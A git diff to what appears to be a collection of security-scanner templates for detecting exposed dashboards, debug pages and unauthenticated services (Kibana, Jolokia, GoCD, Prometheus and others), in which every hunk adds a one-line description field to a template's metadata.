a/http/misconfiguration/confluence-dashboard.yaml +++ b/http/misconfiguration/confluence-dashboard.yaml @@ -4,6 +4,7 @@ info: name: Confluence Dashboard Exposed author: tess severity: low + description: Confluence Dashboard is exposed. metadata: verified: true max-request: 1 diff --git a/http/misconfiguration/debug/flask-werkzeug-debug.yaml b/http/misconfiguration/debug/flask-werkzeug-debug.yaml index 323b999c39..3ea5d6c543 100644 --- a/http/misconfiguration/debug/flask-werkzeug-debug.yaml +++ b/http/misconfiguration/debug/flask-werkzeug-debug.yaml @@ -4,6 +4,7 @@ info: name: Flask Werkzeug Debugger Exposure author: DhiyaneshDk severity: low + description: Flask Werkzeug Debugger is exposed. metadata: verified: true max-request: 1 diff --git a/http/misconfiguration/django-debug-detect.yaml b/http/misconfiguration/django-debug-detect.yaml index 602b6ec363..c645c28a00 100644 --- a/http/misconfiguration/django-debug-detect.yaml +++ b/http/misconfiguration/django-debug-detect.yaml @@ -4,6 +4,7 @@ info: name: Django Debug Method Enabled author: dhiyaneshDK,hackergautam severity: medium + description: Django Debug Method is enabled. metadata: max-request: 1 tags: django,debug,misconfig diff --git a/http/misconfiguration/docker-registry.yaml b/http/misconfiguration/docker-registry.yaml index 3b66505321..3ddd3a6a81 100644 --- a/http/misconfiguration/docker-registry.yaml +++ b/http/misconfiguration/docker-registry.yaml @@ -4,6 +4,7 @@ info: name: Docker Registry Listing author: puzzlepeaches severity: medium + description: Docker Registry Listing enabled. reference: - https://notsosecure.com/anatomy-of-a-hack-docker-registry metadata: diff --git a/http/misconfiguration/docmosis-tornado-server.yaml b/http/misconfiguration/docmosis-tornado-server.yaml index cd2d297581..d525d34ebc 100644 --- a/http/misconfiguration/docmosis-tornado-server.yaml +++ b/http/misconfiguration/docmosis-tornado-server.yaml @@ -4,6 +4,7 @@ info: name: Docmosis Tornado Server Exposure author: tess severity: low + description: Docmosis Tornado Server is exposed. metadata: verified: true max-request: 1 diff --git a/http/misconfiguration/druid-monitor.yaml b/http/misconfiguration/druid-monitor.yaml index c4fefb5a4d..9022120d4f 100644 --- a/http/misconfiguration/druid-monitor.yaml +++ b/http/misconfiguration/druid-monitor.yaml @@ -4,6 +4,7 @@ info: name: Alibaba Druid Monitor Unauthorized Access author: ohlinge severity: high + description: Alibaba Druid Monitor is exposed. metadata: max-request: 1 tags: druid,alibaba,unauth,misconfig diff --git a/http/misconfiguration/dynamic-container-host.yaml b/http/misconfiguration/dynamic-container-host.yaml index 6eb019ed45..b5fc9cf17f 100644 --- a/http/misconfiguration/dynamic-container-host.yaml +++ b/http/misconfiguration/dynamic-container-host.yaml @@ -4,6 +4,7 @@ info: name: Dynamics Container Host - Detect author: DhiyaneshDk severity: low + description: Dynamics Container Host is detected in this template. reference: - https://www.facebook.com/photo/?fbid=631801132323743&set=pcb.631801782323678 metadata: diff --git a/http/misconfiguration/ec2-instance-information.yaml b/http/misconfiguration/ec2-instance-information.yaml index 178e2157cd..51e23f9364 100644 --- a/http/misconfiguration/ec2-instance-information.yaml +++ b/http/misconfiguration/ec2-instance-information.yaml @@ -4,6 +4,7 @@ info: name: EC2 Instance Information author: DhiyaneshDk severity: low + description: EC2 Instance information is exposed. reference: - https://www.facebook.com/ExWareLabs/photos/a.361854183878462/5567070616690100/ metadata: diff --git a/http/misconfiguration/elastic-hd-dashboard.yaml b/http/misconfiguration/elastic-hd-dashboard.yaml index 4a1ed276fa..682181694f 100644 --- a/http/misconfiguration/elastic-hd-dashboard.yaml +++ b/http/misconfiguration/elastic-hd-dashboard.yaml @@ -4,6 +4,7 @@ info: name: Elastic HD Dashboard Exposure author: tess severity: low + description: Elastic HD Dashboard is exposed. metadata: verified: true max-request: 1 diff --git a/http/misconfiguration/elasticsearch.yaml b/http/misconfiguration/elasticsearch.yaml index ac1902d1f9..d7d7ffad76 100644 --- a/http/misconfiguration/elasticsearch.yaml +++ b/http/misconfiguration/elasticsearch.yaml @@ -4,6 +4,7 @@ info: name: ElasticSearch Information Disclosure author: Shine,c-sh0,geeknik severity: low + description: Internal information is exposed in elasticsearch to external users. metadata: verified: true max-request: 4 diff --git a/http/misconfiguration/envoy-admin-exposure.yaml b/http/misconfiguration/envoy-admin-exposure.yaml index 5e7bfb670a..31394d1571 100644 --- a/http/misconfiguration/envoy-admin-exposure.yaml +++ b/http/misconfiguration/envoy-admin-exposure.yaml @@ -4,6 +4,7 @@ info: name: Envoy Admin Exposure author: DhiyaneshDk severity: medium + description: Envoy Admin page exposed. reference: - https://www.envoyproxy.io/docs/envoy/latest/ metadata: diff --git a/http/misconfiguration/espeasy-mega-exposure.yaml b/http/misconfiguration/espeasy-mega-exposure.yaml index b9ca51dcaa..18f20a2146 100644 --- a/http/misconfiguration/espeasy-mega-exposure.yaml +++ b/http/misconfiguration/espeasy-mega-exposure.yaml @@ -4,6 +4,7 @@ info: name: ESPEasy Mega Panel Exposure author: ritikchaddha severity: high + description: ESPEasy Mega Panel is exposed. metadata: verified: true max-request: 1 diff --git a/http/misconfiguration/etcd-unauthenticated-api.yaml b/http/misconfiguration/etcd-unauthenticated-api.yaml index b41d5c896c..506b55f4ce 100644 --- a/http/misconfiguration/etcd-unauthenticated-api.yaml +++ b/http/misconfiguration/etcd-unauthenticated-api.yaml @@ -4,6 +4,7 @@ info: name: etcd Unauthenticated HTTP API Leak author: dhiyaneshDk severity: high + description: etcd HTTP API is exposed. reference: - https://hackerone.com/reports/1088429 metadata: diff --git a/http/misconfiguration/exposed-kafdrop.yaml b/http/misconfiguration/exposed-kafdrop.yaml index cd9494d077..c852e2098c 100644 --- a/http/misconfiguration/exposed-kafdrop.yaml +++ b/http/misconfiguration/exposed-kafdrop.yaml @@ -4,6 +4,7 @@ info: name: Publicly exposed Kafdrop Interface author: dhiyaneshDk severity: low + description: Publicly Kafdrop Interface is exposed. metadata: max-request: 1 tags: exposure,misconfig,kafdrop diff --git a/http/misconfiguration/exposed-kibana.yaml b/http/misconfiguration/exposed-kibana.yaml index 9a45367677..74592c0581 100644 --- a/http/misconfiguration/exposed-kibana.yaml +++ b/http/misconfiguration/exposed-kibana.yaml @@ -4,6 +4,7 @@ info: name: Exposed Kibana author: Shine severity: medium + description: Kibana is exposed. metadata: max-request: 3 tags: kibana,unauth,misconfig diff --git a/http/misconfiguration/express-stack-trace.yaml b/http/misconfiguration/express-stack-trace.yaml index c95477986d..9719dfbfcc 100644 --- a/http/misconfiguration/express-stack-trace.yaml +++ b/http/misconfiguration/express-stack-trace.yaml @@ -4,6 +4,7 @@ info: name: Express Stack Trace author: DhiyaneshDk severity: low + description: Express Stack trace is exposed. metadata: verified: true max-request: 1 diff --git a/http/misconfiguration/filebrowser-unauth.yaml b/http/misconfiguration/filebrowser-unauth.yaml index 180cd35dab..d8a8aea4d7 100644 --- a/http/misconfiguration/filebrowser-unauth.yaml +++ b/http/misconfiguration/filebrowser-unauth.yaml @@ -4,6 +4,7 @@ info: name: File Browser Dashboard - Unauthenticated Access author: ritikchaddha severity: medium + description: File Browser dashboard is exposed. reference: - https://filebrowser.org/ metadata: diff --git a/http/misconfiguration/flask-redis-docker.yaml b/http/misconfiguration/flask-redis-docker.yaml index bb7940cb09..0d560b8ea6 100644 --- a/http/misconfiguration/flask-redis-docker.yaml +++ b/http/misconfiguration/flask-redis-docker.yaml @@ -4,6 +4,7 @@ info: name: Flask Redis Queue Docker - Exposure author: DhiyaneshDk severity: low + description: Flask Redis Queue Docker is exposed. reference: - https://www.facebook.com/photo/?fbid=623621413141715&set=a.467014098802448 metadata: diff --git a/http/misconfiguration/formalms-install.yaml b/http/misconfiguration/formalms-install.yaml index 26920c3f54..36c9fb9f5c 100644 --- a/http/misconfiguration/formalms-install.yaml +++ b/http/misconfiguration/formalms-install.yaml @@ -4,6 +4,7 @@ info: name: Formalms Exposed Installation author: princechaddha severity: high + description: Formalms Installation is exposed. metadata: max-request: 1 tags: misconfig,formalms diff --git a/http/misconfiguration/fusionauth-admin-setup.yaml b/http/misconfiguration/fusionauth-admin-setup.yaml index ca258391c6..f930e8a294 100644 --- a/http/misconfiguration/fusionauth-admin-setup.yaml +++ b/http/misconfiguration/fusionauth-admin-setup.yaml @@ -4,6 +4,7 @@ info: name: FusionAuth Exposed Admin Setup author: ritikchaddha severity: high + description: FusionAuth Admin Setup is exposed. metadata: verified: true max-request: 1 diff --git a/http/misconfiguration/git-web-interface.yaml b/http/misconfiguration/git-web-interface.yaml index 6d2e37d689..8c009c6ac2 100644 --- a/http/misconfiguration/git-web-interface.yaml +++ b/http/misconfiguration/git-web-interface.yaml @@ -4,6 +4,7 @@ info: name: Git web interface author: dhiyaneshDK severity: low + description: Git Web Interface is exposed. metadata: max-request: 1 shodan-query: html:"git web interface version" diff --git a/http/misconfiguration/gitlab/gitlab-api-user-enum.yaml b/http/misconfiguration/gitlab/gitlab-api-user-enum.yaml index 6d6aac772a..f7f9fd20f5 100644 --- a/http/misconfiguration/gitlab/gitlab-api-user-enum.yaml +++ b/http/misconfiguration/gitlab/gitlab-api-user-enum.yaml @@ -4,6 +4,7 @@ info: name: GitLab - User Information Disclosure Via Open API author: Suman_Kar severity: medium + description: GitLab - User Information is exposed Via Open API. reference: - https://gitlab.com/gitlab-org/gitlab-foss/-/issues/40158 metadata: diff --git a/http/misconfiguration/gitlist-disclosure.yaml b/http/misconfiguration/gitlist-disclosure.yaml index bb6c8361e5..5a64b18121 100644 --- a/http/misconfiguration/gitlist-disclosure.yaml +++ b/http/misconfiguration/gitlist-disclosure.yaml @@ -4,6 +4,7 @@ info: name: GitList Disclosure author: dhiyaneshDK severity: low + description: GitList is exposed. metadata: max-request: 1 shodan-query: title:"GitList" diff --git a/http/misconfiguration/global-traffic-statistics.yaml b/http/misconfiguration/global-traffic-statistics.yaml index b26293c038..bf597357c8 100644 --- a/http/misconfiguration/global-traffic-statistics.yaml +++ b/http/misconfiguration/global-traffic-statistics.yaml @@ -4,6 +4,7 @@ info: name: Global Traffic Statistics Exposure author: tess severity: low + description: Global Traffic Statistics page is exposed. metadata: verified: true max-request: 1 diff --git a/http/misconfiguration/gocd/gocd-cruise-configuration.yaml b/http/misconfiguration/gocd/gocd-cruise-configuration.yaml index 06ea46b244..f41cde3bc0 100644 --- a/http/misconfiguration/gocd/gocd-cruise-configuration.yaml +++ b/http/misconfiguration/gocd/gocd-cruise-configuration.yaml @@ -4,6 +4,7 @@ info: name: GoCd Cruise Configuration disclosure author: dhiyaneshDk severity: high + description: GoCd Cruise Configuration is exposed. reference: - https://attackerkb.com/assessments/9101a539-4c6e-4638-a2ec-12080b7e3b50 - https://blog.sonarsource.com/gocd-pre-auth-pipeline-takeover diff --git a/http/misconfiguration/gocd/gocd-encryption-key.yaml b/http/misconfiguration/gocd/gocd-encryption-key.yaml index 6674be53bf..879b90642f 100644 --- a/http/misconfiguration/gocd/gocd-encryption-key.yaml +++ b/http/misconfiguration/gocd/gocd-encryption-key.yaml @@ -4,6 +4,7 @@ info: name: GoCd Encryption Key author: dhiyaneshDk severity: low + description: GoCd Encryption Key is exposed. reference: - https://attackerkb.com/assessments/9101a539-4c6e-4638-a2ec-12080b7e3b50 - https://blog.sonarsource.com/gocd-pre-auth-pipeline-takeover diff --git a/http/misconfiguration/gocd/gocd-unauth-dashboard.yaml b/http/misconfiguration/gocd/gocd-unauth-dashboard.yaml index 559199afe6..3b3a4fd7e0 100644 --- a/http/misconfiguration/gocd/gocd-unauth-dashboard.yaml +++ b/http/misconfiguration/gocd/gocd-unauth-dashboard.yaml @@ -4,6 +4,7 @@ info: name: GoCd Unauth Dashboard author: dhiyaneshDk severity: medium + description: GoCd Dashboard is exposed. metadata: max-request: 1 shodan-query: http.title:"Create a pipeline - Go",html:"GoCD Version" diff --git a/http/misconfiguration/gopher-server.yaml b/http/misconfiguration/gopher-server.yaml index 8d7b5f011e..d8cd8b4d95 100644 --- a/http/misconfiguration/gopher-server.yaml +++ b/http/misconfiguration/gopher-server.yaml @@ -4,6 +4,7 @@ info: name: Gopher Server - Exposure author: DhiyaneshDk severity: medium + description: Gopher Server is exposed. reference: - https://www.facebook.com/photo/?fbid=627579942745862&set=a.467014098802448 metadata: diff --git a/http/misconfiguration/grafana-public-signup.yaml b/http/misconfiguration/grafana-public-signup.yaml index 50139cdbdc..b80a0a7c9e 100644 --- a/http/misconfiguration/grafana-public-signup.yaml +++ b/http/misconfiguration/grafana-public-signup.yaml @@ -4,6 +4,7 @@ info: name: Grafana Public Signup author: pdteam severity: medium + description: Public Signup is enabled on Grafana. metadata: max-request: 1 shodan-query: title:"Grafana" diff --git a/http/misconfiguration/grav-register-admin.yaml b/http/misconfiguration/grav-register-admin.yaml index 66d50ca997..826bd51431 100644 --- a/http/misconfiguration/grav-register-admin.yaml +++ b/http/misconfiguration/grav-register-admin.yaml @@ -4,6 +4,7 @@ info: name: Grav Register Admin User - Detect author: DhiyaneshDk severity: high + description: Exposed Grav admin user register page. metadata: verified: true max-request: 1 diff --git a/http/misconfiguration/haproxy-exporter-metrics.yaml b/http/misconfiguration/haproxy-exporter-metrics.yaml index 32874bb964..12d0d6e0ca 100644 --- a/http/misconfiguration/haproxy-exporter-metrics.yaml +++ b/http/misconfiguration/haproxy-exporter-metrics.yaml @@ -4,6 +4,7 @@ info: name: Detect Haproxy Exporter author: pussycat0x severity: low + description: Haproxy metrics is exposed. metadata: verified: true max-request: 1 diff --git a/http/misconfiguration/healthchecks-ui-exposure.yaml b/http/misconfiguration/healthchecks-ui-exposure.yaml index 9146b52095..364b230308 100644 --- a/http/misconfiguration/healthchecks-ui-exposure.yaml +++ b/http/misconfiguration/healthchecks-ui-exposure.yaml @@ -4,6 +4,7 @@ info: name: Healthchecks UI Exposure author: tess severity: low + description: Healthchecks UI is exposed. metadata: verified: true max-request: 1 diff --git a/http/misconfiguration/hivequeue-agent.yaml b/http/misconfiguration/hivequeue-agent.yaml index 8142ba583c..ded03c4ad1 100644 --- a/http/misconfiguration/hivequeue-agent.yaml +++ b/http/misconfiguration/hivequeue-agent.yaml @@ -4,6 +4,7 @@ info: name: HiveQueue Agent author: DhiyaneshDk severity: low + description: HiveQueue Agent is exposed. reference: - https://www.facebook.com/ExWareLabs/photos/a.361854183878462/5555061814557647/ metadata: diff --git a/http/misconfiguration/hp/unauthorized-hp-printer.yaml b/http/misconfiguration/hp/unauthorized-hp-printer.yaml index 5c979bb0da..3988fa3209 100644 --- a/http/misconfiguration/hp/unauthorized-hp-printer.yaml +++ b/http/misconfiguration/hp/unauthorized-hp-printer.yaml @@ -4,6 +4,7 @@ info: name: Unauthorized HP Printer author: pussycat0x severity: high + description: HP Printer is exposed. metadata: max-request: 1 tags: hp,iot,unauth,misconfig diff --git a/http/misconfiguration/hp/unauthorized-printer-hp.yaml b/http/misconfiguration/hp/unauthorized-printer-hp.yaml index 8b6161672b..6262da0333 100644 --- a/http/misconfiguration/hp/unauthorized-printer-hp.yaml +++ b/http/misconfiguration/hp/unauthorized-printer-hp.yaml @@ -4,6 +4,7 @@ info: name: Unauthorized HP office pro printer author: pussycat0x,r3naissance severity: high + description: HP office pro printer web access is exposed. metadata: max-request: 2 shodan-query: http.title:"Hp Officejet pro" diff --git a/http/misconfiguration/hpe-system-management-anonymous.yaml b/http/misconfiguration/hpe-system-management-anonymous.yaml index 751b31dfd1..fca79f0017 100644 --- a/http/misconfiguration/hpe-system-management-anonymous.yaml +++ b/http/misconfiguration/hpe-system-management-anonymous.yaml @@ -4,6 +4,7 @@ info: name: HPE System Management Anonymous Access author: divya_mudgal severity: low + description: HPE system management anonymous access is enabled. metadata: max-request: 1 tags: hp,unauth,misconfig diff --git a/http/misconfiguration/jaeger-ui-dashboard.yaml b/http/misconfiguration/jaeger-ui-dashboard.yaml index 458ba29a39..2241d378d3 100644 --- a/http/misconfiguration/jaeger-ui-dashboard.yaml +++ b/http/misconfiguration/jaeger-ui-dashboard.yaml @@ -4,6 +4,7 @@ info: name: Jaeger UI author: dhiyaneshDK severity: low + description: Jaeger UI dashboard is exposed. metadata: max-request: 1 shodan-query: http.title:"Jaeger UI" diff --git a/http/misconfiguration/jetty-showcontexts-enable.yaml b/http/misconfiguration/jetty-showcontexts-enable.yaml index 3a303d1c43..a2461b7abe 100644 --- a/http/misconfiguration/jetty-showcontexts-enable.yaml +++ b/http/misconfiguration/jetty-showcontexts-enable.yaml @@ -4,6 +4,7 @@ info: name: Jetty showContexts Enable in DefaultHandler author: dhiyaneshDK severity: low + description: Jetty showContexts is Enabled in DefaultHandler reference: - https://github.com/jaeles-project/jaeles-signatures/blob/master/common/jetty-showcontexts-enable.yaml - https://swarm.ptsecurity.com/jetty-features-for-hacking-web-apps/ diff --git a/http/misconfiguration/jolokia/jolokia-info-disclosure.yaml b/http/misconfiguration/jolokia/jolokia-info-disclosure.yaml index 1dab134aad..b7bd174fe0 100644 --- a/http/misconfiguration/jolokia/jolokia-info-disclosure.yaml +++ b/http/misconfiguration/jolokia/jolokia-info-disclosure.yaml @@ -4,6 +4,7 @@ info: name: Jolokia - Information disclosure author: pussycat0x severity: medium + description: Jolokia - Information is exposed. reference: - https://thinkloveshare.com/hacking/ssrf_to_rce_with_jolokia_and_mbeans/ - https://github.com/laluka/jolokia-exploitation-toolkit diff --git a/http/misconfiguration/jolokia/jolokia-list.yaml b/http/misconfiguration/jolokia/jolokia-list.yaml index 2cefdfb526..5be43a3fec 100644 --- a/http/misconfiguration/jolokia/jolokia-list.yaml +++ b/http/misconfiguration/jolokia/jolokia-list.yaml @@ -4,6 +4,7 @@ info: name: Jolokia - List author: pussycat0x severity: low + description: Jolokia listing enabled. reference: - https://thinkloveshare.com/hacking/ssrf_to_rce_with_jolokia_and_mbeans/ - https://github.com/laluka/jolokia-exploitation-toolkit diff --git a/http/misconfiguration/jolokia/jolokia-mbean-search.yaml b/http/misconfiguration/jolokia/jolokia-mbean-search.yaml index d5ba766b36..19dddedcbb 100644 --- a/http/misconfiguration/jolokia/jolokia-mbean-search.yaml +++ b/http/misconfiguration/jolokia/jolokia-mbean-search.yaml @@ -4,6 +4,7 @@ info: name: Jolokia - Searching MBeans author: pussycat0x severity: low + description: Unauth users can search Mbeans in Jolokia. reference: - https://thinkloveshare.com/hacking/ssrf_to_rce_with_jolokia_and_mbeans/ - https://github.com/laluka/jolokia-exploitation-toolkit diff --git a/http/misconfiguration/jupyter-notebooks-exposed.yaml b/http/misconfiguration/jupyter-notebooks-exposed.yaml index 3b154f6c65..94450d0614 100644 --- a/http/misconfiguration/jupyter-notebooks-exposed.yaml +++ b/http/misconfiguration/jupyter-notebooks-exposed.yaml @@ -4,6 +4,7 @@ info: name: Jupyter notebooks exposed to reading and writing author: johnk3r severity: high + description: Jupyter notebooks are exposed. reference: - https://blog.aquasec.com/python-ransomware-jupyter-notebook metadata: diff --git a/http/misconfiguration/kafka-cruise-control.yaml b/http/misconfiguration/kafka-cruise-control.yaml index 9e5e607063..6203469d75 100644 --- a/http/misconfiguration/kafka-cruise-control.yaml +++ b/http/misconfiguration/kafka-cruise-control.yaml @@ -4,6 +4,7 @@ info: name: Kafka Cruise Control UI author: dhiyaneshDK severity: medium + description: Kafka Cruise Control UI is exposed. metadata: max-request: 1 shodan-query: http.title:"Kafka Cruise Control UI" diff --git a/http/misconfiguration/kubeflow-dashboard-unauth.yaml b/http/misconfiguration/kubeflow-dashboard-unauth.yaml index ea92665127..7c01820afc 100644 --- a/http/misconfiguration/kubeflow-dashboard-unauth.yaml +++ b/http/misconfiguration/kubeflow-dashboard-unauth.yaml @@ -4,6 +4,7 @@ info: name: Kubeflow Unauth author: dhiyaneshDk severity: high + description: Kubeflow internal data is exposed. reference: - https://github.com/kubeflow/kubeflow metadata: diff --git a/http/misconfiguration/laravel-debug-error.yaml b/http/misconfiguration/laravel-debug-error.yaml index eac02713c2..fd489d5c9d 100644 --- a/http/misconfiguration/laravel-debug-error.yaml +++ b/http/misconfiguration/laravel-debug-error.yaml @@ -4,6 +4,7 @@ info: name: Larvel Debug Method Enabled author: dhiyaneshDK severity: medium + description: Larvel Debug method is enabled. metadata: max-request: 1 tags: debug,laravel,misconfig diff --git a/http/misconfiguration/libvirt-exporter-metrics.yaml b/http/misconfiguration/libvirt-exporter-metrics.yaml index 3e86d73578..8c29cc54f4 100644 --- a/http/misconfiguration/libvirt-exporter-metrics.yaml +++ b/http/misconfiguration/libvirt-exporter-metrics.yaml @@ -4,6 +4,7 @@ info: name: Libvirt Exporter Metrics author: DhiyaneshDk severity: low + description: Libvirt Exporter is leaking metrics. metadata: verified: true max-request: 1 diff --git a/http/misconfiguration/liferay/liferay-jsonws.yaml b/http/misconfiguration/liferay/liferay-jsonws.yaml index 781fa2c98d..911b97428b 100644 --- a/http/misconfiguration/liferay/liferay-jsonws.yaml +++ b/http/misconfiguration/liferay/liferay-jsonws.yaml @@ -4,6 +4,7 @@ info: name: Liferay /api/jsonws - API Exposed author: DhiyaneshDk severity: low + description: Liferay /api/jsonws - API is Exposed. reference: - https://github.com/ilmila/J2EEScan/blob/master/src/main/java/burp/j2ee/issues/impl/LiferayAPI.java - https://liferay.dev/blogs/-/blogs/securing-the-api-jsonws-ui?_com_liferay_blogs_web_portlet_BlogsPortlet_showFlags=true&scroll=_com_liferay_blogs_web_portlet_BlogsPortlet_discussionContainer diff --git a/http/misconfiguration/linkerd-ssrf-detect.yaml b/http/misconfiguration/linkerd-ssrf-detect.yaml index 67b2df29ac..48b0c468d0 100644 --- a/http/misconfiguration/linkerd-ssrf-detect.yaml +++ b/http/misconfiguration/linkerd-ssrf-detect.yaml @@ -4,6 +4,7 @@ info: name: Linkerd SSRF detection author: dudez severity: high + description: Linkerd is vulnerable to SSRF. reference: - https://twitter.com/nirvana_msu/status/1084144955034165248 metadata: diff --git a/http/misconfiguration/linktap-gateway-exposure.yaml b/http/misconfiguration/linktap-gateway-exposure.yaml index 16aa0f53d9..97633e5717 100644 --- a/http/misconfiguration/linktap-gateway-exposure.yaml +++ b/http/misconfiguration/linktap-gateway-exposure.yaml @@ -4,6 +4,7 @@ info: name: LinkTap Gateway Exposure author: DhiyaneshDk severity: low + description: LinkTap Gateway is exposed. metadata: verified: true max-request: 1 diff --git a/http/misconfiguration/locust-exposure.yaml b/http/misconfiguration/locust-exposure.yaml index 41923fb5e4..53ace87ff8 100644 --- a/http/misconfiguration/locust-exposure.yaml +++ b/http/misconfiguration/locust-exposure.yaml @@ -4,6 +4,7 @@ info: name: Locust Exposure author: DhiyaneshDK,bhutch severity: medium + description: Locust is exposed. metadata: verified: true max-request: 1 diff --git a/http/misconfiguration/lvm-exporter-metrics.yaml b/http/misconfiguration/lvm-exporter-metrics.yaml index 68e543f485..ba15f17ce0 100644 --- a/http/misconfiguration/lvm-exporter-metrics.yaml +++ b/http/misconfiguration/lvm-exporter-metrics.yaml @@ -4,6 +4,7 @@ info: name: LVM Exporter Metrics author: DhiyaneshDk severity: low + description: LVM Exporter Metrics is exposed. metadata: verified: true max-request: 1 diff --git a/http/misconfiguration/misconfigured-concrete5.yaml b/http/misconfiguration/misconfigured-concrete5.yaml index 3fab94df12..54bc4ae8bf 100644 --- a/http/misconfiguration/misconfigured-concrete5.yaml +++ b/http/misconfiguration/misconfigured-concrete5.yaml @@ -4,6 +4,7 @@ info: name: Misconfigured Concrete5 author: pdteam severity: low + description: Concrete5 CMS is misconfigured. metadata: max-request: 1 tags: misconfig,concrete,cms diff --git a/http/misconfiguration/mobsf-framework-exposure.yaml b/http/misconfiguration/mobsf-framework-exposure.yaml index 3af619bb94..15509d3cf1 100644 --- a/http/misconfiguration/mobsf-framework-exposure.yaml +++ b/http/misconfiguration/mobsf-framework-exposure.yaml @@ -4,6 +4,7 @@ info: name: MobSF Framework - Exposure author: Shine severity: high + description: MobSF Framework is exposed. metadata: verified: true max-request: 1 diff --git a/http/misconfiguration/namedprocess-exporter-metrics.yaml b/http/misconfiguration/namedprocess-exporter-metrics.yaml index f2665a3309..ca6870f677 100644 --- a/http/misconfiguration/namedprocess-exporter-metrics.yaml +++ b/http/misconfiguration/namedprocess-exporter-metrics.yaml @@ -4,6 +4,7 @@ info: name: Named Process Exporter author: DhiyaneshDk severity: low + description: Named process exporter is exposed. metadata: verified: true max-request: 1 diff --git a/http/misconfiguration/nextcloud-install.yaml b/http/misconfiguration/nextcloud-install.yaml index fc84dd5763..8562966ae8 100644 --- a/http/misconfiguration/nextcloud-install.yaml +++ b/http/misconfiguration/nextcloud-install.yaml @@ -4,6 +4,7 @@ info: name: Nextcloud Exposed Installation author: skeltavik severity: high + description: Nextcloud installation is exposed. reference: - https://docs.nextcloud.com/server/latest/admin_manual/installation/installation_wizard.html metadata: diff --git a/http/misconfiguration/nginx/nginx-vhost-traffic-status.yaml b/http/misconfiguration/nginx/nginx-vhost-traffic-status.yaml index 23268fd9ad..ad47a4c1ef 100644 --- a/http/misconfiguration/nginx/nginx-vhost-traffic-status.yaml +++ b/http/misconfiguration/nginx/nginx-vhost-traffic-status.yaml @@ -4,6 +4,7 @@ info: name: Nginx Vhost Traffic Status author: geeknik severity: low + description: Nginx Vhost Traffic status is exposed. reference: - https://github.com/vozlt/nginx-module-vts metadata: diff --git a/http/misconfiguration/node-express-status.yaml b/http/misconfiguration/node-express-status.yaml index a59af05835..1881d52a51 100644 --- a/http/misconfiguration/node-express-status.yaml +++ b/http/misconfiguration/node-express-status.yaml @@ -4,6 +4,7 @@ info: name: Node Express Status - Detect author: DhiyaneshDk severity: low + description: Node Express Status is detected. metadata: verified: true max-request: 1 diff --git a/http/misconfiguration/pa11y-dashboard.yaml b/http/misconfiguration/pa11y-dashboard.yaml index cfa421510c..ef372eff65 100644 --- a/http/misconfiguration/pa11y-dashboard.yaml +++ b/http/misconfiguration/pa11y-dashboard.yaml @@ -4,6 +4,7 @@ info: name: Pa11y Dashboard Exposure author: tess severity: low + description: Pa11y Dashboard is exposed. metadata: verified: true max-request: 1 diff --git a/http/misconfiguration/pcdn-cache-node.yaml b/http/misconfiguration/pcdn-cache-node.yaml index 80cf767368..908307d1f3 100644 --- a/http/misconfiguration/pcdn-cache-node.yaml +++ b/http/misconfiguration/pcdn-cache-node.yaml @@ -4,6 +4,7 @@ info: name: PCDN Cache Node Dataset author: DhiyaneshDk severity: low + description: PCDN Cache Node dataset is exposed. metadata: verified: true max-request: 1 diff --git a/http/misconfiguration/perfsonar-toolkit.yaml b/http/misconfiguration/perfsonar-toolkit.yaml index 405ada767b..5f573d0b1b 100644 --- a/http/misconfiguration/perfsonar-toolkit.yaml +++ b/http/misconfiguration/perfsonar-toolkit.yaml @@ -4,6 +4,7 @@ info: name: perfSONAR Toolkit - Exposure author: DhiyaneshDk severity: medium + description: perfSONAR Toolkit is exposed. reference: - https://www.facebook.com/photo?fbid=619180260252497&set=pcb.619180283585828 metadata: diff --git a/http/misconfiguration/phpmemcached-admin-panel.yaml b/http/misconfiguration/phpmemcached-admin-panel.yaml index 7a52bcd6cd..1e55334191 100644 --- a/http/misconfiguration/phpmemcached-admin-panel.yaml +++ b/http/misconfiguration/phpmemcached-admin-panel.yaml @@ -4,6 +4,7 @@ info: name: phpMemcachedAdmin Panel author: tess severity: medium + description: phpMemcachedAdmin Panel is exposed. metadata: verified: true max-request: 1 diff --git a/http/misconfiguration/phpnow-works.yaml b/http/misconfiguration/phpnow-works.yaml index 8da528f263..63c60d2ad1 100644 --- a/http/misconfiguration/phpnow-works.yaml +++ b/http/misconfiguration/phpnow-works.yaml @@ -4,6 +4,7 @@ info: name: PHPnow works - Exposure author: DhiyaneshDk severity: low + description: PHPnow works is exposed. reference: - https://www.facebook.com/photo/?fbid=618545156982674&set=a.467014098802448 metadata: diff --git a/http/misconfiguration/pinpoint-unauth.yaml b/http/misconfiguration/pinpoint-unauth.yaml index 067200feee..107a5fcac8 100644 --- a/http/misconfiguration/pinpoint-unauth.yaml +++ b/http/misconfiguration/pinpoint-unauth.yaml @@ -4,6 +4,7 @@ info: name: PinPoint Unauth author: dhiyaneshDk severity: high + description: PinPoint is exposed. reference: - https://github.com/pinpoint-apm/pinpoint metadata: diff --git a/http/misconfiguration/postgres-exporter-metrics.yaml b/http/misconfiguration/postgres-exporter-metrics.yaml index 30598e3847..2465ce6903 100644 --- a/http/misconfiguration/postgres-exporter-metrics.yaml +++ b/http/misconfiguration/postgres-exporter-metrics.yaml @@ -4,6 +4,7 @@ info: name: Postgres Exporter Metrics author: DhiyaneshDk severity: low + description: Postgres Exporter Metrics is exposed. metadata: verified: true max-request: 1 diff --git a/http/misconfiguration/prometheus/prometheus-log.yaml b/http/misconfiguration/prometheus/prometheus-log.yaml index fccbfc995d..eb936ce4ec 100644 --- a/http/misconfiguration/prometheus/prometheus-log.yaml +++ b/http/misconfiguration/prometheus/prometheus-log.yaml @@ -4,6 +4,7 @@ info: name: Exposed Prometheus author: dhiyaneshDK,thevillagehacker severity: low + description: Prometheus instance is exposed. metadata: max-request: 3 tags: prometheus,misconfig diff --git a/http/misconfiguration/qvidium-management-system-exposed.yaml b/http/misconfiguration/qvidium-management-system-exposed.yaml index 4043ff4c10..5b05c3a63c 100644 --- a/http/misconfiguration/qvidium-management-system-exposed.yaml +++ b/http/misconfiguration/qvidium-management-system-exposed.yaml @@ -4,6 +4,7 @@ info: name: QVidium Management System Exposed author: tess severity: medium + description: QVidium Management System is Exposed. metadata: verified: true max-request: 1 diff --git a/http/misconfiguration/rabbitmq-exporter-metrics.yaml b/http/misconfiguration/rabbitmq-exporter-metrics.yaml index 58f59332dc..2ca333fa5c 100644 --- a/http/misconfiguration/rabbitmq-exporter-metrics.yaml +++ b/http/misconfiguration/rabbitmq-exporter-metrics.yaml @@ -4,6 +4,7 @@ info: name: RabbitMQ Exporter author: DhiyaneshDk severity: low + description: RabbitMQ Exporter is exposed. metadata: verified: true max-request: 1 